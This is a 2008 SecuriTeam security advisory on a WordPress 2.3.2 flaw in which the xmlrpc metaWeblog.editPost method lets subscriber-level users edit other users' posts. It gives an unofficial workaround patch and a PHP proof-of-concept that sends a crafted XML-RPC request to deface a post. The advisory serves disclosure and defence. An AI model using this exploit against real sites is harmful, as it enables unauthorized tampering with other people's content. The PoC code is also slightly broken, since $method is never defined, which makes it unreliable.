Security News -  Security Reviews -   Exploits -  Tools -  UNIX Focus -  Windows Focus
SecuriTeam™  Beyond Security®  SecuriTeam™ Home  Ask the Team  Mailing Lists  Advertising Info  Blogs  Black Box Testing  Vulnerability Assessment  Vulnerability Scanner SecuriTeam™ in Your Inbox   E-mail this article to a friend New vulnerability? New tool? Tell us	WordPress metaWeblog.editPost Post Arbitrary Modification (xmlrpc, Exploit, Patch) 2 Feb. 2008    Summary WordPress is "a state-of-the-art semantic personal publishing platform with a focus on aesthetics, web standards, and usability". A vulnerability in the way Wordpress handles the metaWeblog.editPost allows remote attackers that have just subscriber privileges to modify the posts of other users.   Credit: The information has been provided by Paul (Yabba) Jones.    Details Protect your website! Use an External Vulnerability Scanner! Nothing to install. First report in 1 hour! www.beyondsecurity.com/vulnerability-scanner Vulnerable Systems:  * Wordpress version 2.3.2 Workaround: To prevent the xmlrpc engine from modifying posts without verifying whether the person has rights to do so or not modify the following PHP code: if ( ('post' == $post_type ) && !current_user_can('edit_post', $post_ID) )             return new IXR_Error(401, __('Sorry, you can not edit this post.')); To include: if ( (1 || 'post' == $post_type ) && !current_user_can('edit_post', $post_ID) )             return new IXR_Error(401, __('Sorry, you can not edit this post.')); Of course the patch is not official, and would probably break other stuff - but security is our number one priority, as a side note version 2.0.x doesn't have that 'post' == ... test. Exploit: <?php /**  * POC : XMLRPC Hack  *  */ $host = ''; // blog url $page = '/xmlrpc.php'; $data = '<?xml version="1.0" ?>         <methodCall>                 <methodName>metaWeblog.editPost</methodName>                 <params>                         <value>                                 <i4>post_ID</i4>                         </value>                         <value>                                 <string>username</string>                         </value>                         <value>                                 <string>password</string>                         </value>                         <struct>                                 <member>                                         <name>post_type</name>                                         <value>page</value>                                 </member>                                 <member>                                         <name>title</name>                                         <value>                                                 <string>Pwnd</string>                                         </value>                                 </member>                                 <member>                                         <name>description</name>                                         <value>Whoo is ma biatch</value>                                 </member>                         </struct>                 </params>         </methodCall>'; $exploited = fsockopen($host, 80, $errorNumber, $errorString); $requestHeader = $method." ".$page." HTTP/1.1\r\n"; $requestHeader.= "Host: ".$host."\r\n"; $requestHeader.= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0\r\n"; $requestHeader.= "Content-Type: application/x-www-form-urlencoded\r\n"; $requestHeader.= "Content-Length: ".strlen($data)."\r\n"; $requestHeader.= "Connection: close\r\n\r\n"; $requestHeader.= $data; fwrite($exploited, $requestHeader ); echo 'done ;)'; ?>  Comments:  Add new comment:  Subject:  Name/Nick/Email:          Chars Left:	All Sections Security News Unix focus Exploits Tools Windows focus Security Reviews  Related Articles Apple CUPS HP-GL/2 filter Code Execution Vulnerability WordPress MU wpmu-Blogs.php Crose Site Scrpting Vulnerability strongSwan IKEv2 Denial of Service Vulnerability Cross-Site Scripting Filter Evasion in Various Frameworks / Applications MySQL Charset Truncation Vulnerability Wordpress user_login Column SQL Truncation Vulnerability Joomla Weak Random Password Reset Token Vulnerability Linux Kernel SCTP-AUTH API Information Disclosure Vulnerability and NULL Pointer Dereferences WordPress SQL Column Truncation Vulnerability (PoC) Apache HTTP Server mod_proxy_ftp Wildcard Characters Cross-Site Scripting Dreambox DM500 Webserver Long URL Request Denial of Service Multiple Vulnerabilities in AWStats Totals vBulletin Cross Site Scripting Vulnerability (popup) Calendarix Basic Two SQL Injection Vulnerabilities Multiple Heap Overflows in Xine-Lib  Featured Articles VMware Emulation Flaw x64 Guest Privilege Escalation WordPress MU wpmu-Blogs.php Crose Site Scrpting Vulnerability Google Docs (HTML code) Multiple Cross Site Scripting Vulnerabilities ABB PCU400 Buffer Overflow InstallShield Update Agent "Rule Script" Code Execution Vulnerability Cross-Site Scripting Filter Evasion in Various Frameworks / Applications Microsoft Windows WRITE_ANDX SMB Command Handling Kernel DoS
	Security News - Security Reviews - Exploits - Tools - UNIX Focus - Windows Focus - Blogs - CVEs

Copyright © 1998-2008 Beyond Security® All rights reserved.
Terms of Use Site Privacy Statement.
SecuriTeam™ is a trademark of Beyond Security®